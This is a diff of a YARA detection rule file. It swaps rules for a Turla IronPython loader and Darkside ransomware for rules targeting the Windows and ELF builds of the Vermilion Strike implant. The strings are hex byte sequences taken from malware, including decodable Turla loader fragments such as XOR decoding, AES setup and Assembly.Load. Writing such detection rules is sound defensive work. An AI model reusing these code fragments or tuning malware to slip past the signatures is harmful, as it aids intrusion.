-rule ARKBIRD_SOLG_APT_Turla_Ironpython_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Beacon_Vermilion_Strike_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect IronPython script used by Turla group"
+		description = "Detect the windows version of the beacon of Vermilion Strike implant"
 		author = "Arkbird_SOLG"
-		id = "303929d4-2c43-5e43-aeb0-09f469f7091b"
-		date = "2021-04-30"
-		modified = "2021-05-01"
-		reference = "https://twitter.com/DrunkBinary/status/1388332507695919104"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Turla/APT_Turla_IronPython_Apr_2021_1.yara#L1-L26"
+		id = "61bb0f02-0eb3-5abe-a2fc-65b94a9486f7"
+		date = "2021-09-14"
+		modified = "2021-09-16"
+		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Beacon_Vermilion_Strike_Sep_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "f6b626cddb4832f842a15eddce705fb24125e4341c425cf27dbbe537e2a98bdc"
+		logic_hash = "801d93fc250666a48fbdd504c8bacab74f0bf7f534a7301a20ad79df3b41750d"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		hash1 = "65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361"
-		hash2 = "c430ebab4bf827303bc4ad95d40eecc7988bdc17cc139c8f88466bc536755d4e"
-		hash3 = "f76257749792cc4e54f75d0e7a83e7a4429395c5dbc48078a8068575d7e9a98"
+		hash1 = "c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5"
+		hash2 = "07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f"
+		hash3 = "7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492"
 		tlp = "White"
-		adversary = "Turla"
+		adversary = "Vermilion Strike"
 
 	strings:
-		$s1 = { 6c 61 6d 62 64 61 20 73 2c 6b 3a 27 27 2e 6a 6f 69 6e 28 5b 63 68 72 28 28 6f 72 64 28 63 29 5e 6b 29 25 30 78 31 30 30 29 20 66 6f 72 20 63 20 69 6e 20 73 5d 29 }
-		$s2 = { 66 72 6f 6d 20 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 20 69 6d 70 6f 72 74 2a }
-		$s3 = { 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 28 4b 65 79 53 69 7a 65 3d 31 32 38 2c 42 6c 6f 63 6b 53 69 7a 65 3d 31 32 38 29 }
-		$s4 = { 72 65 74 75 72 6e 20 53 79 73 74 65 6d 2e 41 72 72 61 79 5b 53 79 73 74 65 6d 2e 42 79 74 65 5d 28 5b 6f 72 64 28 78 29 66 6f 72 20 78 20 69 6e 20 6c 69 73 74 28 73 74 72 29 5d 29 }
-		$s5 = { 53 79 73 74 65 6d 2e 41 72 72 61 79 2e 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 53 79 73 74 65 6d 2e 42 79 74 65 2c [10-12] 2e 4c 65 6e 67 74 68 29 }
-		$s6 = { 28 62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 [4-10] 5b 31 36 3a 5d 29 2c 73 79 73 2e 61 72 67 76 5b 31 5d 2c [4-10] 5b 3a 31 36 5d 2c }
-		$s7 = { 41 73 73 65 6d 62 6c 79 2e 4c 6f 61 64 28 }
-		$s8 = { 20 69 66 20 6c 65 6e 28 73 79 73 2e 61 72 67 76 29 21 3d 32 3a }
-		$s9 = { 65 78 63 65 70 74 20 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 45 78 63 65 70 74 69 6f 6e 20 61 73 20 65 78 3a }
-		$s10 = { 69 66 20 5f 5f 6e 61 6d 65 5f 5f 3d 3d }
-		$s11 = { 2e 66 6f 72 6d 61 74 28 65 78 2e 4d 65 73 73 61 67 65 2c 65 78 2e 53 74 61 63 6b 54 72 61 63 65 29 29 }
+		$s1 = { 50 c7 03 01 00 00 00 e8 cc ?? 00 00 89 43 04 83 f8 ff 74 2c 8b 4d 08 6a 00 8d 44 24 0c 50 53 6a 08 6a 01 51 e8 91 ?? 00 00 85 c0 75 13 8b 44 24 08 66 83 78 08 01 6a 01 50 74 38 e8 80 ?? 00 00 8b 4e 10 2b 4e 0c b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 47 03 c2 3b f8 0f 8c 30 ff ff ff 53 ff 15 }
+		$s2 = { 8b 4c 24 1c 6a 00 6a 00 6a 00 6a 01 51 ff 15 5c a2 02 10 8b 55 0c 8b f0 56 6a 02 53 52 8b cf 89 74 24 34 e8 f0 fb ff ff 8b 45 0c 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 50 57 56 ff 15 50 a2 02 10 8b 4c 24 30 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 53 51 50 89 44 24 3c ff 15 64 a2 02 10 8b f8 89 7c 24 14 8d 49 00 8b b4 24 90 00 00 00 8b 5c 24 7c 8b c3 83 fe 10 73 04 8d 44 24 7c 8d 50 01 8d a4 24 00 00 00 00 8a 08 40 84 c9 75 f9 2b c2 8b cb 83 fe 10 73 04 8d 4c 24 7c 8b 55 20 52 8b 54 24 2c 52 50 51 57 ff 15 4c a2 02 10 85 }
+		$s3 = { 68 00 00 00 10 6a 00 6a 00 6a 00 6a 00 c7 44 24 60 01 00 00 00 ff 15 40 a2 02 10 8b d8 8d 54 24 2c 52 8d 44 24 3c 50 55 53 ff 15 38 a2 02 10 8b e8 85 db 74 07 53 ff 15 44 a2 02 10 85 ed 74 2f 8b }
+		$s4 = { 6a ff 68 [2] 02 10 64 a1 00 00 00 00 50 81 ec 14 01 00 00 a1 c0 72 03 10 33 c4 89 84 24 10 01 00 00 53 a1 c0 72 03 10 33 c4 50 8d 84 24 1c 01 00 00 64 a3 00 00 00 00 33 db 8d 44 24 0c 89 9c 24 24 01 00 00 50 8d 4c 24 18 89 5c 24 0c 51 89 74 24 18 c7 44 24 14 04 01 00 00 ff 15 04 a0 02 10 8d 44 24 14 c7 46 18 0f 00 00 00 89 5e 14 88 5e 04 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 8d 54 24 18 52 8b ce e8 [2] ff ff 89 9c 24 24 01 00 00 c7 44 24 08 01 00 00 00 e8 d1 fe ff ff 85 c0 8b c6 74 0e 6a 02 68 ?? c6 02 10 e8 [2] ff ff 8b c6 8b 8c 24 1c 01 00 00 64 89 0d 00 00 00 00 59 5b 8b 8c 24 }
+		$s5 = { a1 c0 72 03 10 33 c4 89 44 24 2c 68 00 00 00 f0 6a 18 6a 00 6a 00 68 4c 97 03 10 ff 15 30 a0 02 10 85 c0 75 11 33 c0 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 58 97 03 10 8b 0d 54 97 03 10 68 50 97 03 10 6a 00 33 c0 6a 00 66 89 44 24 1e a1 5c 97 03 10 89 54 24 2c 6a 1c 8d 54 24 20 89 44 24 34 a1 4c 97 03 10 89 4c 24 2c 8b 0d 60 97 03 10 52 50 c6 44 24 28 08 c6 44 24 29 02 c7 44 24 2c 0e 66 00 00 c7 44 24 30 10 00 00 00 89 4c 24 40 ff 15 2c a0 02 10 85 c0 74 87 8b 0d 50 97 03 10 56 8b 35 38 a0 02 10 6a 00 68 ?? 82 03 10 6a 01 51 c7 44 24 18 01 00 00 00 c7 44 24 20 01 00 00 00 ff d6 85 c0 74 2b a1 50 97 03 10 6a 00 8d 54 24 0c 52 6a 03 50 ff d6 85 c0 74 16 8b 15 50 97 03 10 6a 00 8d 4c 24 14 51 6a 04 52 ff d6 85 c0 75 12 33 c0 5e 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 50 97 03 10 6a }
 
 	condition:
-		filesize > 100KB and 9 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 30KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Darkside_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Vermilion_Strike_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of Darkside ransomware"
+		description = "Detect the ELF version of Vermilion Strike implant"
 		author = "Arkbird_SOLG"
-		id = "10c0ba57-d6d6-5d1d-bd2a-f6f240d71f8b"
-		date = "2021-05-01"
-		modified = "2021-05-02"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1388301138437578757"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Darkside/RAN_ELF_Darkside_Apr_2021_1.yara#L1-L23"
+		id = "bfc498b6-4d3d-5ae9-a360-d31f8cf6c5fc"
+		date = "2021-09-14"
+		modified = "2021-09-16"
+		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_ELF_Vermilion_Strike_Sep_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "510932893e1e81d6c88e86c7ae2345460b397c936336c7e1a33799dbc1dd6aab"
-		score = 75
+		logic_hash = "fe4bb6da7b29f1ae7c25a657d27f5e60ffa0e7d9f1f09a5a2331e4a80eb79481"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "984ce69083f2865ce90b48569291982e786980aeef83345953276adfcbbeece8"
-		hash2 = "9cc3c217e3790f3247a0c0d3d18d6917701571a8526159e942d0fffb848acffb"
-		hash3 = "c93e6237abf041bc2530ccb510dd016ef1cc6847d43bf023351dce2a96fdc33b"
+		hash1 = "294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc"
+		level = "experimental"
 		tlp = "White"
-		adversary = "-"
+		adversary = "Vermilion Strike"
 
 	strings:
-		$seq1 = { 48 8d 3d d1 e8 3b 00 e8 9c 51 f2 ff 85 c0 74 c6 4c 8d 6c 24 10 4c 89 ef e8 ab bf 02 00 48 8d 1d 34 bb 37 00 49 8d 75 08 48 8d 3d 31 e1 3b 00 48 8d 43 10 48 89 05 1e e1 3b 00 e8 09 1e 02 00 48 8d 05 22 d8 0e 00 48 8b 7c 24 18 c7 05 4b e1 3b 00 01 00 00 00 48 89 05 1c e1 3b 00 48 8d 05 4d d8 0e 00 48 85 ff 48 89 05 13 e1 3b 00 48 8d 05 84 d8 0e 00 48 89 05 0d e1 3b 00 48 8d 05 be d8 0e 00 48 89 05 07 e1 3b 00 48 8d 05 48 d9 0e 00 48 89 05 01 e1 3b 00 48 8d 43 10 48 89 44 24 10 74 05 e8 21 45 f2 ff 4c 8d ac 24 30 03 00 00 4c 89 ef e8 11 bf 02 00 4c 8d b4 24 10 03 00 00 ba 03 00 00 00 4c 89 ee 4c 89 f7 e8 39 62 ff ff 48 8b bc 24 38 03 00 00 48 8d 43 10 48 89 84 24 30 03 00 00 48 85 ff 74 05 e8 db 44 f2 ff 4c 8d 6c 24 30 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 06 62 ff ff 48 8b bc 24 18 03 00 00 48 8d 43 10 48 89 84 24 10 03 00 00 48 85 ff 74 05 e8 a8 44 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 81 e0 3b 00 48 89 05 72 e0 3b 00 e8 0d 1d 02 00 48 8d 05 26 d7 0e 00 48 8b 7c 24 38 c7 05 9f e0 3b 00 01 00 00 00 48 89 05 70 e0 3b 00 48 8d 05 51 d7 0e 00 48 85 ff 48 89 05 67 e0 3b 00 48 8d 05 88 d7 0e 00 48 89 05 61 e0 3b 00 48 8d 05 c2 d7 0e 00 48 89 05 5b e0 3b 00 48 8d 05 4c d8 0e 00 48 89 05 55 e0 3b 00 48 8d 43 10 48 89 44 24 30 74 05 e8 25 44 f2 ff 4c 8d b4 24 50 03 00 00 4c 89 f7 e8 05 c5 02 00 4c 8d 6c 24 50 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 40 61 ff ff 48 8b bc 24 58 03 00 00 48 8d 43 10 48 89 84 24 50 03 00 00 48 85 ff 74 05 e8 e2 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 0b e0 3b 00 48 89 05 fc df 3b 00 e8 47 1c 02 00 48 8d 05 18 d8 0e 00 48 8b 7c 24 58 c7 05 29 e0 3b 00 01 00 00 00 48 89 05 fa df 3b 00 48 8d 05 33 d8 0e 00 48 85 ff 48 89 05 f1 df 3b 00 48 8d 05 5a d8 0e 00 48 89 05 eb df 3b 00 48 8d 05 84 d8 0e 00 48 89 05 e5 df 3b 00 48 8d 05 de d8 0e 00 48 89 05 df df 3b 00 48 8d 43 10 48 89 44 24 50 74 05 e8 5f 43 f2 ff 4c 8d b4 24 70 03 00 00 4c 89 f7 e8 3f c4 02 00 4c 8d 6c 24 70 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 7a 60 ff ff 48 8b bc 24 78 03 00 00 48 8d 43 10 48 89 84 24 70 03 00 00 48 85 ff 74 05 e8 1c 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 95 df 3b 00 48 89 05 86 df 3b 00 e8 81 1b 02 00 48 8d 05 9a d8 0e 00 48 8b 7c 24 78 c7 05 b3 df 3b 00 01 00 00 00 48 89 05 84 df 3b 00 48 8d 05 c5 d8 0e 00 48 85 ff 48 89 05 7b df 3b 00 48 8d 05 fc d8 0e 00 48 89 05 75 df 3b 00 48 8d 05 36 d9 0e 00 48 89 05 6f df 3b 00 48 8d 05 b0 d9 0e 00 48 89 05 69 df 3b 00 48 8d 43 10 48 89 44 24 70 74 05 e8 99 42 f2 ff 4c 8d ac 24 90 03 00 00 4c 89 ef e8 19 be 02 00 4c 8d b4 24 b0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 b1 5f ff ff 4c 8d ac 24 90 00 00 00 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 99 5f ff ff 48 8b bc 24 b8 03 00 00 48 8d 43 10 48 89 84 24 b0 03 00 00 48 85 ff 74 05 e8 3b 42 f2 ff 48 8b bc 24 98 03 00 00 48 8d 43 10 48 89 84 24 90 03 00 00 48 85 ff 74 05 e8 1d 42 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d e6 de 3b 00 48 89 05 d7 de 3b 00 e8 82 1a 02 00 48 8d 05 43 d9 0e 00 48 8b bc 24 98 00 00 00 c7 05 01 df 3b 00 01 00 00 00 48 89 05 d2 de 3b 00 48 8d 05 53 d9 0e 00 48 85 ff 48 89 05 c9 de 3b 00 48 8d 05 72 d9 0e 00 48 89 05 c3 de 3b 00 48 8d 05 94 d9 0e 00 48 89 05 bd de 3b 00 48 8d 05 de d9 0e 00 48 89 05 b7 de 3b 00 48 8d 43 10 48 89 84 24 90 00 00 00 74 05 e8 94 41 f2 ff 4c 8d ac 24 d0 03 00 00 4c 89 ef e8 14 bd 02 00 4c 8d b4 24 f0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 ac 5e ff ff 4c 8d ac 24 b0 00 00 00 ba 03 00 00 00 4c 89 f6 4c 89 ef e8 94 5e ff ff 48 8b bc 24 f8 03 00 00 48 8d 43 10 48 89 84 24 f0 03 00 00 48 85 ff 74 05 e8 36 41 f2 ff 48 8b bc 24 d8 03 00 00 48 8d 43 10 48 89 84 24 d0 03 00 00 48 85 ff 74 05 e8 18 41 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 31 de 3b 00 48 89 05 22 de 3b 00 e8 7d 19 02 00 48 8d 05 56 d9 0e 00 48 8b bc 24 b8 00 00 00 c7 05 4c de 3b 00 01 00 00 00 48 89 05 1d de 3b 00 48 8d 05 6e d9 0e 00 48 85 ff 48 89 05 14 de 3b 00 48 8d 05 95 d9 0e 00 48 89 05 0e de 3b 00 48 8d 05 bf d9 0e 00 48 89 05 08 de 3b 00 48 8d 05 19 da 0e 00 48 89 05 02 de 3b 00 48 8d 43 10 48 89 84 24 b0 00 00 00 74 05 e8 8f 40 f2 ff 4c 8d ac 24 10 04 00 00 4c 89 ef e8 0f bc 02 00 4c 8d b4 24 30 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a7 5d ff ff 4c 8d ac 24 d0 00 00 00 ba 05 00 00 00 4c 89 f6 4c 89 ef e8 8f 5d ff ff 48 8b bc 24 38 04 00 00 48 8d 43 10 48 89 84 24 30 04 00 00 48 85 ff 74 05 e8 31 40 f2 ff 48 8b bc 24 18 04 00 00 48 8d 43 10 48 89 84 24 10 04 00 00 48 85 ff 74 05 e8 13 40 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 7c dd 3b 00 48 89 05 6d dd 3b 00 e8 78 18 02 00 48 8d 05 99 d9 0e 00 48 8b bc 24 d8 00 00 00 c7 05 97 dd 3b 00 01 00 00 00 48 89 05 68 dd 3b 00 48 8d 05 b9 d9 0e 00 48 85 ff 48 89 05 5f dd 3b 00 48 8d 05 e8 d9 0e 00 48 89 05 59 dd 3b 00 48 8d 05 1a da 0e 00 48 89 05 53 dd 3b 00 48 8d 05 84 da 0e 00 48 89 05 4d dd 3b 00 48 8d 43 10 48 89 84 24 d0 00 00 00 74 05 e8 8a 3f f2 ff 4c 8d ac 24 50 04 00 00 4c 89 ef e8 0a bb 02 00 4c 8d b4 24 70 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a2 5c ff ff 4c 8d ac 24 f0 00 00 00 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 8a 5c ff ff 48 8b bc 24 78 04 00 00 48 8d 43 10 48 89 84 24 70 04 00 00 48 85 ff 74 05 e8 2c 3f f2 ff 48 8b bc 24 58 04 00 00 48 8d 43 10 48 89 84 24 50 04 00 00 48 85 ff 74 05 e8 0e 3f f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d c7 dc 3b 00 48 89 05 b8 dc 3b 00 e8 73 17 02 00 48 8d 05 0c da 0e 00 48 8b bc 24 f8 00 00 00 c7 05 e2 dc 3b 00 01 00 00 00 48 89 05 b3 dc 3b 00 48 8d 05 34 da 0e 00 48 85 ff 48 89 05 aa dc 3b 00 48 8d 05 6b da 0e 00 48 89 05 a4 dc 3b 00 48 8d 05 a5 da 0e 00 48 89 05 9e dc 3b 00 48 8d 05 1f db 0e 00 48 89 05 98 dc 3b 00 48 8d 43 10 48 89 84 24 f0 00 00 00 74 05 e8 85 3e f2 ff 4c 8d ac 24 90 04 00 00 4c 89 ef e8 05 ba 02 00 4c 8d b4 24 b0 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 9d 5b ff ff 4c 8d ac 24 10 01 00 00 ba 09 00 00 00 4c 89 f6 4c 89 ef e8 85 5b ff ff 48 8b bc 24 b8 04 00 00 48 8d 43 10 48 89 84 24 b0 04 00 00 48 85 ff 74 05 e8 27 3e f2 ff 48 8b bc 24 98 04 00 00 48 8d 43 10 48 89 84 24 90 04 00 00 48 85 ff 74 05 e8 09 3e f2 ff 48 8d 43 10 49 8d }
-		$seq2 = { 41 56 49 89 fe 41 55 41 89 cd 41 54 45 8d 60 01 55 53 44 89 c3 48 81 ec 98 06 00 00 41 39 cc 89 74 24 10 48 89 54 24 30 0f 84 ab 09 00 00 48 8d 84 24 80 00 00 00 41 8d 70 ff 48 8d ac 24 10 01 00 00 48 89 c7 48 89 44 24 48 e8 0f 89 f6 ff be 01 00 00 00 48 89 ef e8 02 51 f6 ff 4c 8d a4 24 e0 00 00 00 89 de 4c 89 e7 e8 f0 88 f6 ff 48 8d 84 24 b0 00 00 00 48 89 ea 4c 89 e6 48 89 c7 48 89 44 24 20 e8 55 8d f6 ff 48 8d 1d 4e a2 2f 00 49 8d 7c 24 08 4c 8d 7b 10 4c 89 bc 24 e0 00 00 00 e8 48 eb ea ff 48 8d 7d 08 4c 89 bc 24 10 01 00 00 e8 37 eb ea ff 48 8d 84 24 40 01 00 00 41 8d 75 ff 48 89 c7 48 89 44 24 38 e8 8e 88 f6 ff 48 8d 84 24 d0 01 00 00 be 01 00 00 00 48 89 c7 49 89 c7 48 89 44 24 50 e8 71 50 f6 ff 48 8d ac 24 a0 01 00 00 44 89 ee 48 89 ef e8 5e 88 f6 ff 48 8d 84 24 70 01 00 00 4c 89 fa 48 89 ee 48 89 c7 48 89 44 24 40 e8 c3 8c f6 ff 4c 8d 63 10 48 8d 7d 08 48 8d ac 24 00 02 00 00 4c 89 a4 24 a0 01 00 00 e8 b6 ea ea ff 4c 89 ff 4c 89 a4 24 d0 01 00 00 4c 8d a4 24 30 02 00 00 48 83 c7 08 e8 9a ea ea ff 4c 63 7c 24 10 49 8d 46 30 48 89 44 24 18 0f 1f 40 00 e8 b3 7c f6 ff 49 89 c5 e8 ab 75 f6 ff 4c 89 2c 24 4c 8b 6c 24 18 49 89 c1 48 8b 4c 24 20 48 8b 54 24 48 41 b8 01 00 00 00 48 8b 74 24 30 4c 89 ef e8 32 f9 f6 ff 4c 89 fe 48 89 ef e8 b7 4f f6 ff 4c 89 ea 48 89 ee 4c 89 e7 e8 09 d9 f6 ff 48 8b 4c 24 40 48 8b 54 24 38 4d 89 e1 48 8b 74 24 30 4c 89 2c 24 41 b8 01 00 00 00 4c 89 f7 e8 f5 f8 f6 ff 48 8b 94 24 50 02 00 00 48 8b 8c 24 40 02 00 00 41 89 c5 48 39 8c 24 48 02 00 00 48 8d 43 10 48 0f 46 8c 24 48 02 00 00 48 85 d2 48 89 84 24 30 02 00 00 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 40 4f f7 ff 48 8b 94 24 20 02 00 00 48 8b 8c 24 10 02 00 00 48 8d 43 10 48 39 8c 24 18 02 00 00 48 0f 46 8c 24 18 02 00 00 48 89 84 24 00 02 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 fe 4e f7 ff 45 84 ed 0f 84 fd fe ff ff 83 7c 24 10 01 0f 84 bc 04 00 00 48 8d 84 24 e0 03 00 00 4c 8d ac 24 c0 05 00 00 48 89 44 24 10 48 8d 84 24 10 04 00 00 48 89 44 24 08 49 8d 45 08 }
-		$seq3 = { 4c 8d bc 24 00 05 00 00 be 01 00 00 00 4c 89 ff e8 9b 4e f6 ff 4c 8d a4 24 30 05 00 00 4c 89 fa 4c 89 f6 4c 89 e7 e8 05 88 f6 ff 48 8d ac 24 60 05 00 00 48 8b 54 24 18 4c 89 e6 48 89 ef e8 5d d3 f6 ff 48 8d 84 24 90 05 00 00 4c 89 f1 4c 89 ea 48 89 ee 48 89 c7 48 89 44 24 28 e8 ef b9 ff ff 48 8b 74 24 28 49 8d 7e 60 e8 01 59 f6 ff 48 8b 94 24 b0 05 00 00 48 8b 8c 24 a0 05 00 00 48 8d 43 10 48 39 8c 24 a8 05 00 00 48 0f 46 8c 24 a8 05 00 00 48 89 84 24 90 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 ff 4d f7 ff 48 8b 94 24 80 05 00 00 48 8b 8c 24 70 05 00 00 48 8d 43 10 48 39 8c 24 78 05 00 00 48 0f 46 8c 24 78 05 00 00 48 89 84 24 60 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 bd 4d f7 ff 48 8b 94 24 50 05 00 00 48 8b 8c 24 40 05 00 00 48 8d 43 10 48 39 8c 24 48 05 00 00 48 0f 46 8c 24 48 05 00 00 48 89 84 24 30 05 00 00 }
-		$seq4 = { 49 89 ff 41 56 49 89 f6 41 55 41 54 55 53 49 8d 9e c8 01 00 00 48 81 ec f8 05 00 00 48 8d bc 24 d0 00 00 00 e8 e5 52 00 00 48 8d bc 24 00 01 00 00 be 06 0e 5d 00 e8 33 99 ff ff 48 8d b4 24 00 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 bb eb ff ff 48 8b 84 24 00 01 00 00 48 8d b4 24 60 04 00 00 49 8d 9e c0 01 00 00 48 8d 78 e8 e8 9b 10 fd ff 48 8d bc 24 20 01 00 00 be 79 e3 5b 00 e8 e9 98 ff ff 48 8d b4 24 20 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 71 eb ff ff 48 8b 84 24 20 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 58 10 fd ff 48 8d 7c 24 20 4c 89 f6 e8 6b 9d ff ff 48 8d bc 24 40 01 00 00 be 14 e4 5b 00 e8 99 98 ff ff 48 8d 54 24 20 48 8d b4 24 40 01 00 00 48 8d bc 24 d0 00 00 00 e8 1f eb ff ff 48 8b 84 24 40 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 06 10 fd ff 48 8b 44 24 20 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 f0 0f fd ff 48 8d bc 24 60 01 00 00 be 1d e4 5b 00 e8 3e 98 ff ff 48 8d bc 24 c0 00 00 00 e8 41 22 fd ff 48 8d b4 24 c0 00 00 00 48 8d bc 24 60 04 00 00 e8 cc 0f fd ff 48 8d 8c 24 60 04 00 00 48 8d b4 24 60 01 00 00 48 8d bc 24 d0 00 00 00 ba 3f 26 5e 00 e8 fa ce 00 00 48 8d bc 24 60 04 00 00 e8 7d 19 fd ff 48 8d bc 24 c0 00 00 00 e8 70 19 fd ff 48 8b 84 24 60 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 67 0f fd ff 48 8d bc 24 80 01 00 00 be 90 e4 5b 00 e8 b5 97 ff ff 48 8d b4 24 80 01 00 00 48 8d bc 24 d0 00 00 00 ba 48 38 8a 00 e8 3b ea ff ff 48 8b 84 24 80 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 22 0f fd ff 48 8d 94 24 20 04 00 00 48 8d b4 24 00 04 00 00 4c 89 f7 48 c7 84 24 00 04 00 00 78 24 8a 00 48 c7 84 24 20 04 00 00 78 24 8a 00 e8 f2 9c ff ff 48 8d bc 24 a0 01 00 00 be 24 e4 5b 00 e8 40 97 ff ff 48 8d 94 24 00 04 00 00 48 8d b4 24 a0 01 00 00 48 8d bc 24 d0 00 00 00 e8 c3 e9 ff ff 48 8b 84 24 a0 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 aa 0e fd ff 48 8d bc 24 c0 01 00 00 be 2d e4 5b 00 e8 f8 96 ff ff 48 8d 94 24 20 04 00 00 48 8d b4 24 c0 01 00 00 48 8d bc 24 d0 00 00 00 e8 7b e9 ff ff 48 8b 84 24 c0 01 00 00 48 8d b4 24 60 04 00 00 48 8d ac 24 e0 03 00 00 48 8d 78 e8 e8 5a 0e fd ff c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 e2 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 }
-		$seq5 = { e8 bb e4 fd ff 48 8d bc 24 40 04 00 00 48 89 84 24 e0 01 00 00 e8 b6 e9 05 00 48 89 c3 48 89 84 24 e8 01 00 00 e8 96 1d fd ff 8b 40 08 48 83 c3 08 be 33 e4 5b 00 48 89 df 89 84 24 f0 01 00 00 e8 7b e9 fd ff 48 8b b4 24 00 04 00 00 48 89 df 48 8b 56 e8 e8 67 e6 fd ff 48 8d bc 24 e0 01 00 00 e8 5a d9 fd ff 48 83 bc 24 40 04 00 00 00 75 8f c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 37 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 00 48 89 c6 }
-		$seq6 = { 48 8d bc 24 40 04 00 00 48 89 84 24 00 02 00 00 e8 0e e9 05 00 48 89 c3 48 89 84 24 08 02 00 00 e8 ee 1c fd ff 8b 40 08 48 83 c3 08 be 3e e4 5b 00 48 89 df 89 84 24 10 02 00 00 e8 d3 e8 fd ff 48 8b b4 24 20 04 00 00 48 89 df 48 8b 56 e8 e8 bf e5 fd ff 48 8d bc 24 00 02 00 00 e8 b2 d8 fd ff 48 83 bc 24 40 04 00 00 00 75 8f 48 8b 84 24 20 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 ee 0c fd ff 48 8b 84 24 00 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 d5 0c fd ff e8 10 c9 fe ff 84 c0 0f 84 48 02 00 00 48 8d 74 24 1d c6 04 24 00 48 89 ef e8 07 97 00 00 48 8b bc 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 c7 84 24 00 04 00 00 00 00 00 00 48 c7 84 24 08 04 00 00 00 00 00 00 48 c7 84 24 10 04 00 00 00 00 00 00 e8 3e db fe ff 84 c0 0f 84 c9 00 00 00 48 8b 84 24 08 04 00 00 48 2b 84 24 00 04 00 00 48 c1 f8 03 }
